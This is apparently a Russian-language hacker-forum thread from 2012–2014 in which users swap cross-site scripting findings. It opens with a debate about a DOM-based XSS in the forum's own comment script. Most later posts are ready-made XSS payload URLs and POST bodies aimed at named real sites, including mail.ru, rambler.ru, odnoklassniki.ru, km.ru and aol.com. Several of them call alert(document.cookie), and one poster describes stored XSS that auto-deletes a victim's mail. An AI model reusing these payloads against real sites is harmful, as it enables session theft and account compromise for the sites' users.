Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл

eclipse
31.03.2012, 13:32
Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл




function ajaxComment(){ //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;


Действительно, херня какая-то ))))

Оказывается при выполнении функции отправки комментария и происходит инжект, в код который занимается собственно отправкой:


function ajaxComment(){ //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;
var author = document.getElementsByName('author')[1].value;
var message = document.getElementsByName('comment')[0].value;
var csrf = document.getElementsByName('csrfmiddlewaretoken')[0].value;
$.ajax({
type: "POST",
url: document.location.href,
data: "csrfmiddlewaretoken="+csrf+"&author="+author+"&comment="+message,
success: function() {
$('#comment').hide().append(''+author+' написал'+message+'').show('slow');
}
});
return false;

}

И хотя данные после отправки на php чистятся, сама возможность инъекции присутствует, но ее нельзя удаленно эксплуатировать, потому что страница защищена опять такие тем самым токеном, если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос (http://hacker-pro.net/thread/22765/p1.html)

А моя статья оказывается тут нифига не поможет, потому что она нужна когда есть удаленный xss и требуется csrf, а у нас нет удаленного xss ))

M_script
31.03.2012, 13:57
Вывод: Java Script инъекция есть


Но человек должен вставить свой код и нажать кнопку отправки. Есть идеи насчет практической реализации атаки?


если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос


Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.

eclipse
31.03.2012, 14:14
Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.


Я тоже самое сказал)) Имелось ввиду что можно было бы кликабельную пассивку получить..

Насчет практики, нет, не юзабельно (удаленно)

Хотя, теоретически))

Можно:

1.отправить человека на свой php скрипт

2.скрипт выводит iframe с античатом

3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент

4.инжект выполнится))

Ну в общем это из раздела фантастики))))

M_script
31.03.2012, 15:21
2.скрипт выводит iframe с античатом
3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент


Не получится. http://ru.wikipedia.org/wiki/Правило_ограничения_домена

Га-Ноцри
31.03.2012, 15:52
km.ru​

После ошибки авторизации на главной странице, вы будете перенаправлены на http://n.mail.km.ru/extra/form. Не фильтруется поле "Пароль".

Post:​


user_login=support-mail&user_domain=freemail.ru&user_password=%22%3E%3Cscript%3Ealert%28%27Hello%2 C+world%27%29%3B%3C%2Fscript%3E&op=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&form_build_id=form-a080de13ffb21494853525a2e1c6cf72&form_id=_imap_mail_extra_login_form

Утверждение верно для всех доменов, кроме km.ru (@freemail.ru, @bossmail.ru etc.)

Unknown
08.04.2012, 19:16
Активная xss в теле письма на 59.ru

Активная xss в теле письма на http://59.ru/

Почта (http://59.ru/mail)

Xss код




Далее я сделал бонус,автоудаление письма

Код автоудаление письма




Я бы этот код запихал в JS фаил и вызвал через xss.

Но есть но,нужно сделать очистку корзины,поэтому надо делать через Js фаил.

PS создайте тему с активными xss в теле письма пжл.

Unknown
14.04.2012, 15:21
Активная xss на foto.meta.ua

Активка тут http://foto.meta.ua/4552903.image

Уязвимый код тэги

" onmouseover='alert(document.cookie)'

Выполняется принаведении на тэги.

Марок
26.04.2012, 21:23
job.gala.net

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert('xz che za')

Sleep
15.07.2012, 12:42
http://avia.rambler.ru/anytime?max_days=%3Cimg%20src=x:%20onerror=alert(d ocument.cookie)%3E

http://avia.rambler.ru/anytime?min_days=%3Cimg%20src=x:%20onerror=alert(d ocument.cookie)%3E

_Spamer_
20.11.2012, 00:52
Пассивная XSS odnoklassniki.ru

https://cards2.odnoklassniki.ru/index.html?ServiceDescr=XSS

_Spamer_
22.11.2012, 21:55
Пассивная XSS odnoklassniki.ru

http://api.odnoklassniki.ru/fb.do?method=users.getInfo&js_callback=

WallHack
22.12.2013, 20:20
Пассивная XSS в mail.ru

Пассивная XSS в mail.ru работает в опере


http://gameshop.mail.ru/order/?back=%22%3E%3Cscript%3Ealert%28%29%3C/script%3E

//Может ещё выложу

totenkopf
22.01.2014, 20:46
http://rs.mail.ru/b23468426.swf?link1=%6A%61%76%61%73%63%72%69%70%74 %3A%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%6 3%6F%6F%6B%69%65%29

Клик на банер

Это активная вроде? Но может надо кому

psihoz26
09.03.2014, 15:27
http://richmedia.aol.com/demopopup.php?id=9132&demo_link=/ width=1400 height=900 >alert(document.cookie)

psihoz26
15.07.2014, 16:37
http://vwo.osm.rambler.ru/index.php?page=wotall%3C/h1%3E%3Cbr%3E%3Cscript%3Ealert('w0rm.pw')%3C/script%3E

faza02
27.10.2014, 13:25
http://errors.aol.com/login/?alert(/XSS/)